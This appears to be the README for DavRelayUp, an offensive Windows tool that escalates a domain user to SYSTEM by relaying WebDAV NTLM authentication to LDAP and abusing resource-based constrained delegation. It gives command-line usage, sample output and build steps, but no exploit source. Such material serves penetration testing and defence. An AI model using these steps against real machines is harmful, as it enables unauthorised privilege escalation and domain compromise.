A quick and dirty port of KrbRelayUp with modifications to allow for NTLM relay from webdav to LDAP in order to streamline the abuse of the following attack primitive:
This is essentially a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced (the default settings).
DavRelayUp - Relaying you to SYSTEM, again...
Usage: DavRelayUp.exe [-c] [-cn COMPUTERNAME] [-cp PASSWORD | -ch NTHASH]
RBCD Options:
-c (--CreateNewComputerAccount) Create new computer account for RBCD. Will use the current authenticated user.
-cn (--ComputerName) Name of attacker owned computer account for RBCD. (default=DAVRELAYUP$)
-cp (--ComputerPassword) Password of computer account for RBCD. (default=RANDOM [if -c is enabled])
-ch (--ComputerPasswordHash) Password NT hash of computer account for RBCD. (either -cp or -ch must be specified)
-i (--Impersonate) User to impersonate. Should be a local administrator in the target computer. (default=Administrator)
KrbSCM Options:
-s (--ServiceName) Name of the service to be created. (default=KrbSCM)
-sc (--ServiceCommand) Service command [binPath]. (default = spawn cmd.exe as SYSTEM)
General Options:
-p (--Port) Port for WebDAV Server (default=55555)
-d (--Domain) FQDN of domain. (Optional)
-dc (--DomainController) FQDN of domain controller. (Optional)
-ssl Use LDAP over SSL. (Optional)
-n Use CreateNetOnly (needs to be on disk) instead of PTT when importing ST (Optional)
-v (--Verbose) Show verbose output. (Optional)
-h (--Help) Show help
If DavRelayUp gets stuck at one of these stages - try using a different port by specifying [-p] flag
DavRelayUp - Relaying you to SYSTEM, again...
[+] WebClient Service started successfully
[+] Starting Relay Server on Port 55555
[+] Coercing System Authentication
DavRelayUp - Relaying you to SYSTEM, again...
[+] WebClient Service started successfully
[+] Starting Relay Server on Port 55555
[+] Coercing System Authentication
[+] WebDAV Request: No Authorization header
[+] WebDAV Response: Sending 401 Unauthorized with "WWW-Authenticate: NTLM" header
PS C:\Tools\DavRelayUp> cd GoRelayServer
PS C:\Tools\DavRelayUp\GoRelayServer> go build --buildmode=c-shared -ldflags="-s -w" -o "../DavRelayUp/Costura64/GoRelayServer.dll" main.go
This will build the GoRelayServer DLL and save it in "DavRelayUp\DavRelayUp\Costura64\GoRelayServer.dll" -> This is the folder from which Costura.Fody will embed it in the final DavRelayUp.exe executable.